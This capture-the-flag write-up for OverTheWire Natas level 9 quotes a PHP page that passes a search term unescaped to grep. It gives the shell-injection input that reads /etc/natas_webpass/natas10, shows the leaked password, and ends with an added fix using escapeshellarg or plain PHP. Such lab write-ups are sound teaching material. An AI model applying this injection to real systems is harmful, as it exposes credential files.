[OverTheWire] Natas – Level 09
http://natas9.natas.labs.overthewire.org/
Find words containing…
Click View sourcecode:
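[php]
<?php
$key = "";

// Take the search term from the request parameters.
if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    // Vulnerable: $key is interpolated into the shell command line unescaped.
    passthru("grep -i $key dictionary.txt");
}
?>
[/php]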
The grep command syntax can be referenced at:
Information provided at the start:
Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.
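Because the $key variable is not escaped, its value is placed into the shell command line as-is, so the shell parses it as part of the command rather than as a single search pattern. We can inject with the following input: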
'' /etc/natas_webpass/natas10;
Result:
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
→ flag = nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu.
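How the unescaped $key in the source above could be closed off, as an added example that is not part of the challenge's code or of the original write-up. The function names build_grep_command and search_dictionary are hypothetical, and the example assumes a POSIX shell and a dictionary.txt in the working directory.

```php
<?php
// Added example: two ways to handle "needle" without shell injection.

// Option 1: keep grep, but pass the needle as exactly one shell word.
// escapeshellarg() wraps the value in single quotes and escapes any
// embedded single quote, so spaces and ";" lose their shell meaning.
// "-e" marks the value as the pattern even if it starts with "-",
// and "--" ends option parsing before the file name.
function build_grep_command(string $needle, string $file = "dictionary.txt"): string {
    return "grep -i -e " . escapeshellarg($needle) . " -- " . escapeshellarg($file);
}

// Option 2: no shell at all. Case-insensitive fixed-string search in PHP
// (note: this matches substrings, not grep regular expressions).
function search_dictionary(string $needle, string $file = "dictionary.txt"): array {
    $matches = [];
    $lines = @file($file, FILE_IGNORE_NEW_LINES); // false if unreadable
    foreach ($lines ?: [] as $line) {
        if (stripos($line, $needle) !== false) {
            $matches[] = $line;
        }
    }
    return $matches;
}

$key = "";
if (array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

// is_string() rejects array input such as needle[]=x before it reaches
// the command builder.
if (is_string($key) && $key !== "") {
    passthru(build_grep_command($key));
}
?>
```

With either option, the input shown in this write-up is treated as one literal search term against dictionary.txt only.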